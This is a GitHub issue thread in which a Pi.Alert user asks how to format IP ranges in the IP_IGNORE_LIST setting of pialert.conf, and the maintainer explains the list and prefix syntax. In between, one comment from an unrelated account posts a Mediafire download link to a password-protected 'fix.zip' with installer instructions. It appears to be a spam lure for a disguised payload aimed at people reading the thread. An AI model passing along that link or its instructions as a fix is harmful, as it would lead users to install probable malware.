### ISSUE TITLE
[Documentation] format of the IP_IGNORE_LIST parameter (pialert.conf)

### ISSUE THREAD

**Issue by stanelie** [leiweibau/Pi.Alert#373]
Hello.

What is the correct way to describe an IP range in the IP_IGNORE_LIST parameter of the pialert.conf?

10.10.0.0/21 ?
10.10.0.0-10.10.255.255 ?

Thanks!

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by leiweibau** [comment]
I took the extra time to update the Help / FAQ > Explanations for the file “pialert.conf” page. 

```
['IP-Address 1', 'IP-Address 2']
This IP address(es) will be filtered out from the scan results. It is also possible to specify only the beginning of a IP address. All addresses with the same prefix will also be filtered out
```

```
['192.168.1.', '192.168.1']
```

192.168.1. - blocks 192.168.1.0-192.168.1.255
192.168.1 - 192.168.1, 192.168.10, 192.168.100.0-192.168.199.255

**Comment by stanelie** [comment]
Oh, sorry, I missed that, I was expecting an formatting example in the .conf file itself.

Thanks again!
